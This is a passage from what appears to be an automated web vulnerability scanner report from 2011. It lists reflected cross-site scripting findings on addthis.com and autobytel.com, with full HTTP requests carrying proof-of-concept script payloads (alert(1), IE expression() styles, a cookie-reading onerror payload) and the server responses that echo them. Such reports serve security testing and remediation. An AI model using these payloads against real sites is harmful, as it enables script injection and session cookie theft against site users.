Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:39:43 GMT
Connection: close
Content-Length: 27095


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "searchgoogle.aspx6035c";alert(1)//bcb3780252b?st=";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "searchgoogle.aspx6035c";alert(1)//bcb3780252b?st=" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
wind
...[SNIP]...

4.465. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68d3f"-alert(1)-"252ce06ac3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php68d3f"-alert(1)-"252ce06ac3b HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:03:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=60shcckh91q4gr3p48mb8j2sb4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php68d3f"-alert(1)-"252ce06ac3b";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.466. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5469c<script>alert(1)</script>694be222f67 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php5469c<script>alert(1)</script>694be222f67 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:03:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=3djnq75atcfpbioq7ivu4ugpn2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php5469c<script>alert(1)</script>694be222f67</strong>
...[SNIP]...

4.467. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c000a"-alert(1)-"d2071d67556 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/c000a"-alert(1)-"d2071d67556 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/c000a"-alert(1)-"d2071d67556";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.468. http://www.addthis.com/bookmark.php [pub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the pub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31b76"%20style%3dx%3aexpression(alert(1))%209db792d721a was submitted in the pub parameter. This input was echoed as 31b76\" style=x:expression(alert(1)) 9db792d721a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?wt=nw&pub=sistergoldenhair31b76"%20style%3dx%3aexpression(alert(1))%209db792d721a&url= HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="sistergoldenhair31b76\" style=x:expression(alert(1)) 9db792d721a" />
...[SNIP]...

4.469. http://www.addthis.com/bookmark.php [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c73a7"style%3d"x%3aexpression(alert(1))"ad069683679 was submitted in the url parameter. This input was echoed as c73a7"style="x:expression(alert(1))"ad069683679 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?wt=nw&pub=sistergoldenhair&url=c73a7"style%3d"x%3aexpression(alert(1))"ad069683679 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="c73a7"style="x:expression(alert(1))"ad069683679" />
...[SNIP]...

4.470. http://www.addthis.com/feed.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /feed.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6e65<script>alert(1)</script>e68058a383 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feed.phpd6e65<script>alert(1)</script>e68058a383 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:03:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4hrqgaprgqm9fn84gll6icugn6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1463
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>feed.phpd6e65<script>alert(1)</script>e68058a383</strong>
...[SNIP]...

4.471. http://www.addthis.com/feed.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /feed.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b84e"-alert(1)-"516cc2a215 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feed.php9b84e"-alert(1)-"516cc2a215 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=r92fn8cu7bp5hbkbkasehn8an1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1437
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/feed.php9b84e"-alert(1)-"516cc2a215";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.472. http://www.addthis.com/feed.php [h1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /feed.php

Issue detail

The value of the h1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7187"style%3d"x%3aexpression(alert(1))"6a86d525460 was submitted in the h1 parameter. This input was echoed as d7187"style="x:expression(alert(1))"6a86d525460 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xmld7187"style%3d"x%3aexpression(alert(1))"6a86d525460&t1= HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: pub=kicko; expires=Sat, 23-Jul-2011 16:03:43 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7939
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<input name="h1" type="hidden" value="http://www.x64bitdownload.com/rss/downloads.xmld7187"style="x:expression(alert(1))"6a86d525460" checked="checked" />
...[SNIP]...

4.473. http://www.addthis.com/feed.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /feed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1604"style%3d"x%3aexpression(alert(1))"64e1f3b8e2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1604"style="x:expression(alert(1))"64e1f3b8e2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml/a1604"style%3d"x%3aexpression(alert(1))"64e1f3b8e2b&t1= HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: pub=kicko; expires=Sat, 23-Jul-2011 16:03:53 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7942
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<input name="h1" type="hidden" value="http://www.x64bitdownload.com/rss/downloads.xml/a1604"style="x:expression(alert(1))"64e1f3b8e2b" checked="checked" />
...[SNIP]...

4.474. http://www.addthis.com/feed.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /feed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99026"-alert(1)-"b65f93cd92c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feed.php/99026"-alert(1)-"b65f93cd92c HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: pub=deleted; expires=Sun, 24-Jan-2010 16:03:19 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7617
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<script type="text/javascript">
var u = "/feed.php/99026"-alert(1)-"b65f93cd92c";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.475. http://www.addthis.com/feed.php [pub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /feed.php

Issue detail

The value of the pub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e60a1"style%3d"x%3aexpression(alert(1))"e5131ef9ed7 was submitted in the pub parameter. This input was echoed as e60a1"style="x:expression(alert(1))"e5131ef9ed7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /feed.php?pub=kickoe60a1"style%3d"x%3aexpression(alert(1))"e5131ef9ed7&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1= HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: pub=kickoe60a1%22style%3D%22x%3Aexpression%28alert%281%29%29%22e5131ef9ed7; expires=Sat, 23-Jul-2011 16:03:32 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7976
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="kickoe60a1"style="x:expression(alert(1))"e5131ef9ed7" />
...[SNIP]...

4.476. http://www.autobytel.com/a.cfml [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /a.cfml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 849d4"><script>alert(1)</script>b7a2f5f5095 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a.cfml?849d4"><script>alert(1)</script>b7a2f5f5095=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23472
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:46:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:46:09 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!-- begin: fnc_getComputerName.cfm -->

<!-- end: fnc_getComputerName.cfm -->
<!-- ReferringSite: --> <!-- Referer: None --> <!--
This file creates a boxerjam cookie that expires
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/a.cfml?849d4"><script>alert(1)</script>b7a2f5f5095=1">
...[SNIP]...

4.477. http://www.autobytel.com/ask-our-mechanics/my-garage.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /ask-our-mechanics/my-garage.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 558ec"><script>alert(1)</script>629e085a616 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ask-our-mechanics/my-garage.htm?558ec"><script>alert(1)</script>629e085a616=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:52:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:35 GMT
Content-Length: 22206
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:34 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/ask-our-mechanics/my-garage.htm?558ec"><script>alert(1)</script>629e085a616=1">
...[SNIP]...

4.478. http://www.autobytel.com/auto-insurance-quotes.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /auto-insurance-quotes.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b355e"><script>alert(1)</script>20cc0a1c0fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /auto-insurance-quotes.htm?b355e"><script>alert(1)</script>20cc0a1c0fe=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:55:01 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33688


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/auto-insurance-quotes.htm?b355e"><script>alert(1)</script>20cc0a1c0fe=1">
...[SNIP]...

4.479. http://www.autobytel.com/car-advice.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-advice.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e5d6"><script>alert(1)</script>5ac1d95ea8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-advice.htm?3e5d6"><script>alert(1)</script>5ac1d95ea8c=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:56:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:26 GMT
Connection: close
Connection: Transfer-Encoding
